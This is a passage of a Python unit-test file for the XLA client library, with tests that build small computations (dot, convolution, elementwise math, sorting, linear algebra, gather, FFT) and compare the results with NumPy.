_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
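# Note (added): 0x7FFF occupies 15 bits, so a 32-bit word has 17 leading zeros;
# 0x12345678 occupies 29 bits, leaving 3.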
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
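# Note (added): 8 exponent bits and 7 mantissa bits match the bfloat16 layout,
# so the trailing mantissa bits of 0x1.32fffep-3 are rounded away.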
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
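    # GatherDimensionNumbers below: the last axis of `indices`
    # (index_vector_dim=2) holds (row, col) start positions mapped to operand
    # dimensions 0 and 1 (start_index_map), and each gathered 1x1 slice keeps
    # its two axes as output offset dimensions (offset_dims=[1, 2]).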
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.fftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.ifftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.rfftn(b, axes=(1, 2, 3)),
rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(c, expected=np.fft.irfftn(a, axes=(1, 2, 3)),
rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
